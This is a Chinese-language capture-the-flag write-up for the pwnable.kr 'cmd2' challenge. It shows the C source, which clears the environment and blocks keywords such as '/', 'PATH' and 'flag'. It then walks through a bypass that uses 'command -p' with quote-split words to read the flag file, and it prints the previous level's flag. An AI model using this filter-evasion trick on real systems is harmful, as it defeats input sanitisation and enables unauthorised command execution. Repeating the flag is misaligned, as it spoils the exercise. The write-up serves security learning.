题目
Daddy bought me a system command shell.
but he put some filters to prevent me from playing with it without his permission...
but I wanna play anytime I want!
ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)
cmd1的flag: mommy now I get what PATH environment is for :)
题解
#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "=")!=0;
r += strstr(cmd, "PATH")!=0;
r += strstr(cmd, "export")!=0;
r += strstr(cmd, "/")!=0;
r += strstr(cmd, "`")!=0;
r += strstr(cmd, "flag")!=0;
return r;
}
extern char** environ;
void delete_env(){
char** p;
for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}
int main(int argc, char* argv[], char** envp){
delete_env();
putenv("PATH=/no_command_execution_until_you_become_a_hacker");
if(filter(argv[1])) return 0;
printf("%s\n", argv[1]);
system( argv[1] );
return 0;
}
过滤了export, =, PATH, /, `, flag
和cmd1类似的设置, 需要对shell的特性足够了解(其实man sh
现场读文档也行
先测试一下cmd2
$ ./cmd2 cat ./flag
cat
sh: 1: cat: not found
shell不知道cat在哪里, 斜杠会被过滤器阻塞, 所以需要找到解决这个问题的方法. 因为这个命令是通过system()执行的, 所以可以看到它将使用默认的sh
shell来执行最后一个命令.
查看一下sh的文档
command [-p] [-v] [-V] command [arg ...]
Execute the specified command but ignore shell functions when searching for it. (This is useful when you have a
shell function with the same name as a builtin command.)
-p search for command using a PATH that guarantees to find all the standard utilities.
-V Do not execute the command but search for the command and print the resolution of the command search.
This is the same as the type builtin.
-v Do not execute the command but search for the command and print the absolute pathname of utilities, the
name for builtins or the expansion of aliases.
发现可以用-p
设置sh使用默认环境变量执行命令
问题的解就有了
./cmd2 "command -p cat \"f\"\"l\"\"a\"\"g\""